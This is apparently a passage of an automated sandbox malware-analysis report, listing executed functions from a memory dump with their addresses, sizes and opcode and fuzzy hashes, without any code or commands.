                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID: H$K$[$`
                          • API String ID: 0-2859840478
                          • Opcode ID: fb605bd72fea9ebb1d82fce90675081670e3debfccf7eac51186a2b7ae52a2de
                          • Instruction ID: 81d9f94546f397bc0bf3a265f7b771f415f6b1675c24ab0f2b25ba8f972dc562
                          • Opcode Fuzzy Hash: fb605bd72fea9ebb1d82fce90675081670e3debfccf7eac51186a2b7ae52a2de
                          • Instruction Fuzzy Hash: 8021EA70E4932ECAEB74DF90C8A4BF977B1AB54314F1105BDD11D9A2A1CB785A81CF44

                          Executed Functions

                          Function 00007FFD9B795705 Relevance: 1.5, Instructions: 1471COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48a8f4dd20ae1d6673358f52fbed2072fe7482020f46595b8ffce2a871ec3449
                          • Instruction ID: c9fb74dfd0b687ef3e47372def17636e8b5200e3d8ce5387205c96d103ff797a
                          • Opcode Fuzzy Hash: 48a8f4dd20ae1d6673358f52fbed2072fe7482020f46595b8ffce2a871ec3449
                          • Instruction Fuzzy Hash: EFC2BB74A1961D8FDBA4EB58C8A5BA9B3F1FF59300F5142E9D01DD32A5CA34AE81CF40
                          Function 00007FFD9B783585 Relevance: .3, Instructions: 270COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb5052c7bdb35bbd01d28095d6cde078bad10f8a5f85d8a2c36cd0debae3759e
                          • Instruction ID: 311f164eb1f3a3bb208b85a96b18fe5cb8f8da91859ba4e9f023ebd728512c6c
                          • Opcode Fuzzy Hash: eb5052c7bdb35bbd01d28095d6cde078bad10f8a5f85d8a2c36cd0debae3759e
                          • Instruction Fuzzy Hash: A791D571A1894D8FEB94DFACC8657AC7BE1FF59310F5102BAE00ED72E6DAB528018741
                          Function 00007FFD9B780DDC Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: H$H
                          • API String ID: 0-136785262
                          • Opcode ID: 7d2191176a7eec8a1e57b3167a11fb07e7e67b55587a8feca67256591ca43c80
                          • Instruction ID: 9e7f99fbd1296d64d4954ab10dbde81f42dc29e9130eaa72f20369bf914e48b9
                          • Opcode Fuzzy Hash: 7d2191176a7eec8a1e57b3167a11fb07e7e67b55587a8feca67256591ca43c80
                          • Instruction Fuzzy Hash: 7451D531E0AE0E4EEBA8EF68C8A5BED73A1EF54311F1143B9D00D971B6DE3869458740
                          Function 00007FFD9B78F8D4 Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$=
                          • API String ID: 0-1825213468
                          • Opcode ID: 33ae91df2d985d1c7cd2f6ac2b0852c3b6d80b676a5c04f4f2b87561c2ab83d0
                          • Instruction ID: 5aceb7bd92767afc91f2b961c4e91ede6f000fc4507c0d41815a2a521ebabe49
                          • Opcode Fuzzy Hash: 33ae91df2d985d1c7cd2f6ac2b0852c3b6d80b676a5c04f4f2b87561c2ab83d0
                          • Instruction Fuzzy Hash: C511FE30D0A62D8FDB64DF54C8A47A9B7B1EF94311F1046E9D409A72A1CB386F81CF40
                          Function 00007FFD9B78EF7C Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: c${
                          • API String ID: 0-2213537145
                          • Opcode ID: 7f2cde3d568e5cad442f2dc9d93c78a8ef91c767a8fcc4a0bdeaa94852fbcce9
                          • Instruction ID: 303762eccb287af24676454047d46b9a1df5a2244a9c5689864843a22b4f597c
                          • Opcode Fuzzy Hash: 7f2cde3d568e5cad442f2dc9d93c78a8ef91c767a8fcc4a0bdeaa94852fbcce9
                          • Instruction Fuzzy Hash: D9110A30A0972D8AEB74DF50C8A47A876B1EF54301F1146E9C00D962B1CB785B80CF41
                          Function 00007FFD9B78C619 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: _
                          • API String ID: 0-701932520
                          • Opcode ID: 96ecdf36e7bdca05723873b223ae42ca2bd09986e0a7ae2f58b6467d7751b731
                          • Instruction ID: e47d6d7956bfe17ebeb608a36d43ee30b48fcdf2d0d66aae46d2a241407aaa99
                          • Opcode Fuzzy Hash: 96ecdf36e7bdca05723873b223ae42ca2bd09986e0a7ae2f58b6467d7751b731
                          • Instruction Fuzzy Hash: 29914432A0974E8EDB55ABB8D8652FD3BA0EF15321F0502BBD049CB0A2DF386545CB90
                          Function 00007FFD9B781668 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: UAVW
                          • API String ID: 0-3038902782
                          • Opcode ID: 9a3ad3fb88026d1ac829b9734c93dc26d41f9fb34f544734c0ec5135ab849644
                          • Instruction ID: b5adeaf5e6981c4b92e3fd6d3e1fb84c0210b67945d1614535a3744c9d6cdc7c
                          • Opcode Fuzzy Hash: 9a3ad3fb88026d1ac829b9734c93dc26d41f9fb34f544734c0ec5135ab849644
                          • Instruction Fuzzy Hash: 7871CE31B09F494FDB58DE5888A56A977E2FF98301B15027EE45EC36A2DE30AD028781
                          Function 00007FFD9B780D2A Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: H
                          • API String ID: 0-2852464175
                          • Opcode ID: 68dc757d959d5f2ca8be4c4056a4f8e52a0a0e62eab8fba60f966fad484d2d3d
                          • Instruction ID: 841c4d3026fd2f3fad21e21687bac6e7be60ce9940e2f47014be495c9ce2301d
                          • Opcode Fuzzy Hash: 68dc757d959d5f2ca8be4c4056a4f8e52a0a0e62eab8fba60f966fad484d2d3d
                          • Instruction Fuzzy Hash: A971C531E09A0E4FEB68EB68C8A5BED73A1EF55311F0143B9D00DD71B6DE346A458B40
                          Function 00007FFD9B781CBD Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: UAVW
                          • API String ID: 0-3038902782
                          • Opcode ID: ec97d684ecf0020ffea38750610960c2c9532464f03275a31bc0e115376edce7
                          • Instruction ID: ea5822ac37e13be1510b2e36b9461bed4e0f206773612ef8c30f3db9fa6fe378
                          • Opcode Fuzzy Hash: ec97d684ecf0020ffea38750610960c2c9532464f03275a31bc0e115376edce7
                          • Instruction Fuzzy Hash: AE51E431B18B894FDB5CDE1888A56B977E2FF98301F15467ED45EC72A2DE34A802C781
                          Function 00007FFD9B7820D5 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID: WVSH
                          • API String ID: 0-4131290416
                          • Opcode ID: c1710885888646b96592dca749d3a327a940574a8e0f675c36a1ffc90387acba
                          • Instruction ID: 329413441db54cdafa61076e7f2d4aefc1061656de2f0569371e8325441dc91f
                          • Opcode Fuzzy Hash: c1710885888646b96592dca749d3a327a940574a8e0f675c36a1ffc90387acba
                          • Instruction Fuzzy Hash: A2415A31F0EA4A4FD356DBB884A51B877E1EF46312F0641FAD40CC71B6DE38A9428341
                          Function 00007FFD9B78D829 Relevance: .4, Instructions: 395COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8ac499fdea24259a00a0c0b32496e41d4bd938ea585f352029b8dfa153a7a9e9
                          • Instruction ID: f64c3e86af288208c6ca3ef63301d8117f5f85abb6de1f5fcf796aa43d241f4e
                          • Opcode Fuzzy Hash: 8ac499fdea24259a00a0c0b32496e41d4bd938ea585f352029b8dfa153a7a9e9
                          • Instruction Fuzzy Hash: CAE13B71E19A5D8FEBA8EF98C4A57ACB7A1FF58301F4441BED01DD32A6CA346940CB41
                          Function 00007FFD9B790690 Relevance: .4, Instructions: 359COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cf41ff9c1eea0a4b84b8b3eb9d44661bee702f4289037e5762248276be22db58
                          • Instruction ID: 4a477e23df372480368627a18f2a0ab6b46be35670d660c60a2eff902e0a4324
                          • Opcode Fuzzy Hash: cf41ff9c1eea0a4b84b8b3eb9d44661bee702f4289037e5762248276be22db58
                          • Instruction Fuzzy Hash: 06D11C70E1A65DCFEB68DBA8C464ABCB7B1FF59701F1101B9D01DE32A1CA396981CB41
                          Function 00007FFD9B7939A5 Relevance: .2, Instructions: 243COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e4132e337e521615a1b6f10ff935df714c98b9ca986e2bbc23e91ee51ebe0b5
                          • Instruction ID: d9b7ce6c12cff6717540a06eacbbe47e0a541d18c79f7029bcf0bfda437b5c81
                          • Opcode Fuzzy Hash: 8e4132e337e521615a1b6f10ff935df714c98b9ca986e2bbc23e91ee51ebe0b5
                          • Instruction Fuzzy Hash: 8F91CE70E0961D8FDBA4DBA8C8557EDB6B1FF59301F5242BAD00DE32A1DF345A848B50
                          Function 00007FFD9B78AC18 Relevance: .2, Instructions: 198COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 70bf5049e25c5331f3aa14a316b1da1b9c1614fa37fcef108cf0c6d86b6fcbaf
                          • Instruction ID: 8f51b216b4d7a8ca08cc87e0f455adc09ab9311b5e8ed9625a586574c174669e
                          • Opcode Fuzzy Hash: 70bf5049e25c5331f3aa14a316b1da1b9c1614fa37fcef108cf0c6d86b6fcbaf
                          • Instruction Fuzzy Hash: C761DB70E19A1D8FDBA4EBA8D8A57ED77F1EF58341F510279D00DE32A1DE346A418B40
                          Function 00007FFD9B795EC5 Relevance: .2, Instructions: 192COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f31861ac89f1a771d4b21150eff14866b4b2c135a42635601ff27a4ffe09e5f
                          • Instruction ID: e76c105c1418e0a90c91db8f39ce3021cabb477dfca80f3b9ddfbb303b164635
                          • Opcode Fuzzy Hash: 4f31861ac89f1a771d4b21150eff14866b4b2c135a42635601ff27a4ffe09e5f
                          • Instruction Fuzzy Hash: 8871EA70E0971D8EEBA4DBA4C4657ADB7B1FF55340F5142BAD00DE62A1DF385A84CB01
                          Function 00007FFD9B78AC9D Relevance: .2, Instructions: 184COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be0b9e512bf922c0ea60eaea3f99e41ae589dcc58a45902e0c0e3eba4ecaea38
                          • Instruction ID: 888e12d45a9e2443bf949b448d0dd4746329eb0d0f9652d0be9679e6c5a771ff
                          • Opcode Fuzzy Hash: be0b9e512bf922c0ea60eaea3f99e41ae589dcc58a45902e0c0e3eba4ecaea38
                          • Instruction Fuzzy Hash: 72512C61F0EE8E4FE7229BB884A95E87BE1FF52312B0546B6C059CB0F6ED34A505C351
                          Function 00007FFD9B7831B1 Relevance: .2, Instructions: 177COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f22bc3cd3b8cb5ee2acd0dbcc880dff5fa4bc0042f445e46c9a70b1c2050193d
                          • Instruction ID: 0dd372c2599b86c8e6105c42dcb33d20369351bf3b5d3d1543030e3e5ec4b2d3
                          • Opcode Fuzzy Hash: f22bc3cd3b8cb5ee2acd0dbcc880dff5fa4bc0042f445e46c9a70b1c2050193d
                          • Instruction Fuzzy Hash: DF61FF70E09A1D8FEB54DB98C4A46EDB7F1FF54302F524179E409E72B2DA386A44CB50
                          Function 00007FFD9B795040 Relevance: .2, Instructions: 153COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0585d6b2929efdc453b3c15e4b94b658ab24b5f03c8642672c4102ed1c4157cf
                          • Instruction ID: 2ac18aeeb2741a1e70203a415667e982f08494b2f9d0ea02de72e035514bfc6c
                          • Opcode Fuzzy Hash: 0585d6b2929efdc453b3c15e4b94b658ab24b5f03c8642672c4102ed1c4157cf
                          • Instruction Fuzzy Hash: A7516370E19A5D8FEBA4EBA8C4A9BADBBF1FF58300F10016DD00DD72A5DE3568418B40
                          Function 00007FFD9B78C765 Relevance: .1, Instructions: 136COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 513f8e437c1c9340dc1f3bee927ffec8009cc655e208dab33dd33fcd239c686b
                          • Instruction ID: 46f5065fc8f4a433c9b77a0ade4316e745883b6daf1b455d8ce1c238923010f6
                          • Opcode Fuzzy Hash: 513f8e437c1c9340dc1f3bee927ffec8009cc655e208dab33dd33fcd239c686b
                          • Instruction Fuzzy Hash: BE41D02BB8E61A5EE7157ABCB8614FD7B50DF91332F0502B7E51DCA0E3DE3424458A90
                          Function 00007FFD9B791940 Relevance: .1, Instructions: 132COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 041d47fd72f11e5f0cd3d1ba26bbaeb80375f91c57faaa60fa597c6da629e7bd
                          • Instruction ID: fa7ab3de06b4bcdcbabc421b373278fe67c0a9ef2cc95db9789e0978a29cbffd
                          • Opcode Fuzzy Hash: 041d47fd72f11e5f0cd3d1ba26bbaeb80375f91c57faaa60fa597c6da629e7bd
                          • Instruction Fuzzy Hash: 52517BA180E7C64FD7038B748C766A57FF0AF27204B0E45EBD485CB1B3E2289959D762
                          Function 00007FFD9B78C7FB Relevance: .1, Instructions: 88COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b56d1a93bc276d3252f94eb8b8bc0858c8b76b6ecae5e7b991496074ebd47064
                          • Instruction ID: f0d9b6d9fd95d14b10c17f38fb93460f4fddc2bf487691cb0d51fc5f4ef46ed2
                          • Opcode Fuzzy Hash: b56d1a93bc276d3252f94eb8b8bc0858c8b76b6ecae5e7b991496074ebd47064
                          • Instruction Fuzzy Hash: EE21B126F8EA1B5EEB557BF8B0654FC3790EF21322F0506B6E41D950F2CE3825408A95
                          Function 00007FFD9B783505 Relevance: .1, Instructions: 83COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d71806ec575fbb3b116396274d0601ad7a0e452e3491d8f88420a27841f2de0e
                          • Instruction ID: 040d001fe6f4edd14bafa75b769b2c165ea22eb6575e85744d248d990f817d74
                          • Opcode Fuzzy Hash: d71806ec575fbb3b116396274d0601ad7a0e452e3491d8f88420a27841f2de0e
                          • Instruction Fuzzy Hash: 39218130E0AA4E8FEB69EF6884A95BD77A0FF14302F1205BAE41DC21B1DB34A6408740
                          Function 00007FFD9B793B23 Relevance: .1, Instructions: 82COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0aea244b76c68210939450ffbb37a114a91252774ea4aa048606bec0cd2753a9
                          • Instruction ID: e98af86617e888fe9c3bb475ac05ed056188aefce17bfa6ed23abd9f4641668b
                          • Opcode Fuzzy Hash: 0aea244b76c68210939450ffbb37a114a91252774ea4aa048606bec0cd2753a9
                          • Instruction Fuzzy Hash: DD31A670E1962D8FDBA4DB98C864BECB7F1FB58301F5142AAD00DE32A1DB745A848F50
                          Function 00007FFD9B790DDA Relevance: .1, Instructions: 80COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b597ef2eea7a3f9d704ccb76f5051a2e1c39819da3eaae1994a420bfa0600859
                          • Instruction ID: 32661bf3e0bd40eacc6dbbc3537207b5702a3d24aa918cae9d2ddca61b6f30fb
                          • Opcode Fuzzy Hash: b597ef2eea7a3f9d704ccb76f5051a2e1c39819da3eaae1994a420bfa0600859
                          • Instruction Fuzzy Hash: C231E734E0962D9FDB68DF94D8A0BFDB7B1EF55311F1141AAD10EA76A0CA346A80CF00
                          Function 00007FFD9B7833D8 Relevance: .1, Instructions: 74COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bf7b91dc77f0f0653fcfcf6057f3df3ad75b15725e371ab61aba5c75a4b93f0
                          • Instruction ID: a7880405d75cb97a9dae9bb7d503abd48b16ff70f15b79a1879739241726ef79
                          • Opcode Fuzzy Hash: 4bf7b91dc77f0f0653fcfcf6057f3df3ad75b15725e371ab61aba5c75a4b93f0
                          • Instruction Fuzzy Hash: 9021903094E78A8FD743EB74C8586A53BF0EF17315B0644FAD408CB072DA38A546C721
                          Function 00007FFD9B792518 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4adf3487a48052f029c6ad0df92ff5ca1174131f69f42bd8f99103dcb92ab55c
                          • Instruction ID: fbd02ab3953fa839a27c23c073f78b201ab6cb83f2c88b2e03739a9754116351
                          • Opcode Fuzzy Hash: 4adf3487a48052f029c6ad0df92ff5ca1174131f69f42bd8f99103dcb92ab55c
                          • Instruction Fuzzy Hash: B5215B2094E78A4FD75AABB088385A47FB0AF16304B1645EBD44AC70F3DA295945C711
                          Function 00007FFD9B7938FA Relevance: .1, Instructions: 66COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62582d58400391621c132a8b12f6df08c8b9d07edf28a9ff323f648c65cc7b05
                          • Instruction ID: 5acb766cf4a7ec45652f651b9121a52f53e2a0e330c29a2960f6bf72b639ed5c
                          • Opcode Fuzzy Hash: 62582d58400391621c132a8b12f6df08c8b9d07edf28a9ff323f648c65cc7b05
                          • Instruction Fuzzy Hash: 4A21F631A0E78E4EE752EBA898686F97BE0FF15314F0605B6D408C70B3DA24A644C721
                          Function 00007FFD9B794585 Relevance: .1, Instructions: 66COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b7bb61e57b84d9060903e238effbfcf1e8b1ffce4c984f3e724d22cacdb99de
                          • Instruction ID: ecf9f39fc24e9bb32fb2fe19be307eaaf5ae32dbdc20d2a9ecb668f10bcef22f
                          • Opcode Fuzzy Hash: 6b7bb61e57b84d9060903e238effbfcf1e8b1ffce4c984f3e724d22cacdb99de
                          • Instruction Fuzzy Hash: 9911A270A09A4E8FDB68EFA484696B97BA0FF58305F0102BED41DC61A6DA346540C741
                          Function 00007FFD9B780A01 Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ff2dda29afb38c3b4547cb5199aaa13790b40f57b0d929adc5b8184ac0ba4f0
                          • Instruction ID: 2011620ecf51ef5c510b1e3bb859098824b2090ab3c46f476b702101ed8ebc1e
                          • Opcode Fuzzy Hash: 1ff2dda29afb38c3b4547cb5199aaa13790b40f57b0d929adc5b8184ac0ba4f0
                          • Instruction Fuzzy Hash: C7119135A1AA0E8FE790EBA8C8995BD77E0FF54701F4146BAC41CC71B6DE38A5458701
                          Function 00007FFD9B794A25 Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000013.00000002.1798406215.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ffd9b780000_MImOLbdPzolqACtrpVpcRPdPWZg.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b1d8075dea4212a868f354e422afab60d2ad9c81354566218d2faa44e9f2b90
                          • Instruction ID: 58ad902ade10bfdba682d58e46b093cdf560f5c88162f9e458ea781d0d18714a
                          • Opcode Fuzzy Hash: 6b1d8075dea4212a868f354e422afab60d2ad9c81354566218d2faa44e9f2b90
                          • Instruction Fuzzy Hash: C2112371E0EB8E4BEB68DFA488B52B837A0FF25304F0101BED41DC25F2DA296514C601
                          Function 00007FFD9B7944E9 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
